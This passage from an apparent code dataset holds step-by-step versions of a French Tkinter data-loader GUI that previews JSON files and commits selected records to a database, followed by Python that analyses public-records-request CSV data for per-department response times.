self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', 
textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n <mask token>\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-3": "<mask token>\n\n\nclass DataLoader:\n\n def __init__(self, master):\n self.anne = {}\n self.master = Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900, 680)\n self.master.resizable(width=False, height=True)\n self.tree = CheckboxTreeview(self.master, height=25)\n os.chdir('DonneJson')\n with open('DonneUtile.json', 'r') as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir('..')\n self.Nomfichier = os.listdir('DonneJson')\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction = False\n self.db = DbDataloader(self.modeTransaction, self.master)\n self.main()\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, 
column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n\n def CaseCocher(self, mode='Transanction'):\n 
style = Style()\n style.configure('W.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='red')\n style.configure('G.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='green')\n\n def getCheckDict(obj):\n selectDate = {}\n for t in obj:\n try:\n selectDate[t[:7]].append(t)\n except:\n selectDate[t[:7]] = []\n selectDate[t[:7]].append(t)\n return selectDate\n\n def valider():\n if self.tree.get_checked():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vous etes sur pour la validation')\n if choice == True:\n self.db.Alldayselected = getCheckDict(self.tree.\n get_checked())\n if self.modeTransaction == False:\n self.db.insertCommunique()\n else:\n self.db.insertCommunique()\n else:\n messagebox.showerror(title='Erreur !!!', message=\n 'Cocher une case au moins !!!')\n\n def commit():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un commit?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode Commit en cours')\n self.db.conn.commit()\n self.db.conn.start_transaction()\n\n def rollback():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un rollback?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode rollback en cours ')\n self.db.conn.rollback()\n self.db.conn.start_transaction()\n label_welcomec = Label(self.master, text=\n 'La liste des fichiers json obtenus avec leur arborescence',\n borderwidth=7, relief='groove')\n label_welcomec.grid(row=1, column=3, pady=8)\n vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview\n )\n vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02)\n self.tree.configure(yscrollcommand=vsb.set)\n self.tree.insert('', 'end', 'ALL', text='SELECT ALL')\n for key, val in self.anne.items():\n self.tree.insert('ALL', 'end', key, text=key)\n for i in val:\n self.tree.insert(key, 'end', i, text=i)\n self.tree.grid(row=3, column=3, pady=2)\n button_name = Button(self.master, text='Valider', command=valider)\n 
button_name.grid(row=3, column=4, pady=2)\n if mode == 'Transanction':\n commit_buttoon_name = Button(self.master, text='COMMIT',\n command=commit, style='G.TButton')\n commit_buttoon_name.grid(row=4, column=3, pady=2)\n rollback_buttoon_name = Button(self.master, text='ROLLBACK !',\n style='W.TButton', command=rollback)\n rollback_buttoon_name.grid(row=4, column=4, pady=2)\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-4": "from ttkwidgets import CheckboxTreeview\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom DbDataloader import *\n\n\nclass DataLoader:\n\n def __init__(self, master):\n self.anne = {}\n self.master = Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900, 680)\n self.master.resizable(width=False, height=True)\n self.tree = CheckboxTreeview(self.master, height=25)\n os.chdir('DonneJson')\n with open('DonneUtile.json', 'r') as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir('..')\n self.Nomfichier = os.listdir('DonneJson')\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction = False\n self.db = DbDataloader(self.modeTransaction, self.master)\n self.main()\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, 
padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire 
Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n\n def CaseCocher(self, mode='Transanction'):\n style = Style()\n style.configure('W.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='red')\n style.configure('G.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='green')\n\n def getCheckDict(obj):\n selectDate = {}\n for t in obj:\n try:\n selectDate[t[:7]].append(t)\n except:\n selectDate[t[:7]] = []\n selectDate[t[:7]].append(t)\n return selectDate\n\n def valider():\n if self.tree.get_checked():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vous etes sur pour la validation')\n if choice == True:\n self.db.Alldayselected = getCheckDict(self.tree.\n get_checked())\n if self.modeTransaction == False:\n self.db.insertCommunique()\n else:\n self.db.insertCommunique()\n else:\n messagebox.showerror(title='Erreur !!!', message=\n 'Cocher une case au moins !!!')\n\n def commit():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un commit?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode Commit en cours')\n self.db.conn.commit()\n self.db.conn.start_transaction()\n\n def rollback():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un rollback?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode rollback en cours ')\n self.db.conn.rollback()\n self.db.conn.start_transaction()\n label_welcomec = Label(self.master, text=\n 'La liste des fichiers json obtenus avec leur arborescence',\n borderwidth=7, relief='groove')\n label_welcomec.grid(row=1, column=3, pady=8)\n vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview\n )\n vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02)\n self.tree.configure(yscrollcommand=vsb.set)\n self.tree.insert('', 'end', 'ALL', text='SELECT ALL')\n for key, val in self.anne.items():\n self.tree.insert('ALL', 'end', key, text=key)\n for i in val:\n self.tree.insert(key, 'end', i, text=i)\n 
self.tree.grid(row=3, column=3, pady=2)\n button_name = Button(self.master, text='Valider', command=valider)\n button_name.grid(row=3, column=4, pady=2)\n if mode == 'Transanction':\n commit_buttoon_name = Button(self.master, text='COMMIT',\n command=commit, style='G.TButton')\n commit_buttoon_name.grid(row=4, column=3, pady=2)\n rollback_buttoon_name = Button(self.master, text='ROLLBACK !',\n style='W.TButton', command=rollback)\n rollback_buttoon_name.grid(row=4, column=4, pady=2)\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-5": "from ttkwidgets import CheckboxTreeview\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom DbDataloader import *\nclass DataLoader():\n def __init__(self,master):\n self.anne={}\n self.master=Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900,680)\n self.master.resizable(width=False,height=True)\n self.tree = CheckboxTreeview(self.master,height=25)\n os.chdir(\"DonneJson\")\n with open(\"DonneUtile.json\",\"r\") as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir(\"..\")\n self.Nomfichier=os.listdir(\"DonneJson\")\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction=False\n self.db=DbDataloader(self.modeTransaction,self.master)\n self.main()\n #Fonction pour lire les fichiers json deja dans le module DataAcquisition\n def main(self):\n choice= messagebox.askyesno(\"askquestion\",\"Cliquer sur Oui pour charger les données en mode Trasactionnel\")\n if choice :\n self.modeTransaction=True\n self.db.conn.start_transaction()\n self.master.title(\"Data Loader : Mode Transanction=­OUI\")\n self.create_widgets()\n else:\n self.modeTransaction=False\n self.master.title(\"Data Loader : Mode Transanction=­NON\")\n self.create_widgets(\"Non Transanction\")\n def 
lireFichier(self):\n label_welcome1 = Label(self.master,text=\"Prévisualiser les données\",\n borderwidth = 7,\n width = 40,\n relief=\"groove\"\n )\n label_welcome1.grid(row = 1, column = 0, padx = 50)\n label_welcome2 = Label(self.master,text=\"Selectionner le fichier pour la lecture\")\n label_welcome2.grid(row = 2, column = 0, )\n listbox = Listbox(self.master, width=40, height=20,selectmode=SINGLE)\n i=0\n for fichier in self.Nomfichier:\n if \"2\" in fichier:\n listbox.insert(i, fichier)\n i=i+1\n def afficherObjet(Obj):\n try:\n os.chdir(\"DonneJson\")\n textFichier={}\n with open(Obj,\"r\") as rf:\n textFichier.update(json.load(rf))\n rf.close() \n if textFichier:\n texte=\"{\\n\"\n for key,val in textFichier.items():\n b =\"\\t{\\n\"\n c=\"\\t\"+str(key)+\" :\\n\"\n d=\"\"\n for key1,val1 in val.items():\n d=str(d)+\"\\t\\t\"+str(key1)+\" :\"+\" \"+str(val1)+\"\\n\"\n e=\"\\t},\\n\"\n texte=texte+b+c+d+e\n texte=texte+\"}\\n\"\n texte=texte+\"\\n\\n\\t\"+str(len(textFichier))+\" Objets eenregistrer dans le fichier \"+Obj \n os.chdir(\"..\")\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title=\"Erreur !!!\", message=\"Fichier \"+Obj+\" introuvable\")\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes=afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n # fenetre blocante : empeche l’ouverture de fenetres identiques\n self.master.wait_visibility(fil)\n fil.grab_set()\n # end fenetre blocante\n fil.geometry(\"600x600\")\n fil.title(\"Fichier :\"+listbox.get(listbox.curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil,wrap=NONE,height=30, width=100,yscrollcommand=yscroll.set,\n xscrollcommand=xscroll.set) \n text1.config(state=\"normal\")\n text1.insert(\"1.0\",textes) \n text1.pack(side=LEFT) \n yscroll.config(command=text1.yview) \n 
xscroll.config(command=text1.xview) \n fil.mainloop()\n fil.quit()\n except :\n messagebox.showerror(title=\"Erreur !!!\", message=\"Vous selectionner un fichier d`abord\")\n listbox.grid(row = 3, column = 0, pady =20 )\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item)\n btn.grid(row = 3, column = 1, pady =6 )\n #Fonction pour cocher les dates ensuite enregistrer vers la bases de donneef\n def CaseCocher(self,mode=\"Transanction\"): \n style = Style() \n style.configure('W.TButton', font =\n ('calibri', 15, 'bold', 'underline'),\n foreground = 'red')\n style.configure('G.TButton', font =\n ('calibri', 15, 'bold','underline'),\n foreground = 'green')\n #recuperer les ligne selectionnes \n def getCheckDict(obj):\n selectDate={}\n for t in obj:\n try:\n selectDate[t[:7]].append(t)\n except:\n selectDate[t[:7]]=[]\n selectDate[t[:7]].append(t)\n return selectDate\n def valider():\n if self.tree.get_checked():\n #si il choisi oui (en transanction)\n choice= messagebox.askyesno(\"Askquestion!!!\",\"Vous etes sur pour la validation\")\n if choice==True:\n self.db.Alldayselected =getCheckDict(self.tree.get_checked())\n if self.modeTransaction == False:\n #Mode Non Transactionnel\n self.db.insertCommunique()\n else:\n #Mode Transaction\n self.db.insertCommunique() \n else:\n messagebox.showerror(title=\"Erreur !!!\", message=\"Cocher une case au moins !!!\")\n def commit():\n choice= messagebox.askyesno(\"Askquestion!!!\",\"Vouliez-vouz faire un commit?\")\n if choice==True:\n messagebox.showinfo(\"Info\",\"Mode Commit en cours\")\n self.db.conn.commit()\n self.db.conn.start_transaction()\n def rollback():\n choice= messagebox.askyesno(\"Askquestion!!!\",\"Vouliez-vouz faire un rollback?\")\n if choice==True:\n messagebox.showinfo(\"Info\",\"Mode rollback en cours \")\n self.db.conn.rollback()\n self.db.conn.start_transaction()\n label_welcomec = Label(self.master,\n text=\"La liste des fichiers json obtenus avec leur arborescence\",\n borderwidth = 
7,\n relief=\"groove\")\n label_welcomec.grid(row = 1, column = 3, pady = 8)\n vsb = Scrollbar(self.master, orient=\"vertical\", command=self.tree.yview)\n vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.020)\n self.tree.configure(yscrollcommand=vsb.set)\n self.tree.insert(\"\", \"end\", \"ALL\", text=\"SELECT ALL\")\n for key,val in self.anne.items():\n self.tree.insert(\"ALL\", \"end\", key, text=key)\n for i in val:\n self.tree.insert(key,\"end\", i, text=i)\n self.tree.grid(row = 3, column = 3, pady = 2)\n button_name=Button(self.master,text=\"Valider\",command=valider)\n button_name.grid(row = 3, column = 4, pady = 2)\n if mode==\"Transanction\":\n commit_buttoon_name=Button(self.master,text=\"COMMIT\",command=commit,style=\"G.TButton\"\n )\n commit_buttoon_name.grid(row = 4, column = 3, pady = 2)\n rollback_buttoon_name=Button(self.master, text = 'ROLLBACK !',\n style = 'W.TButton',command=rollback)\n rollback_buttoon_name.grid(row = 4, column = 4, pady = 2)\n def create_widgets(self,mode=\"Transanction\"):\n self.lireFichier()\n self.CaseCocher(mode)\n def mains(self,obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-ids": [ 5, 6, 7, 8, 9 ] }
[ 5, 6, 7, 8, 9 ]
<|reserved_special_token_0|> def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist <|reserved_special_token_0|> def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') 
for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, 
recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() <|reserved_special_token_0|> def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 
0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist <|reserved_special_token_0|> def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate 
!= None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = 
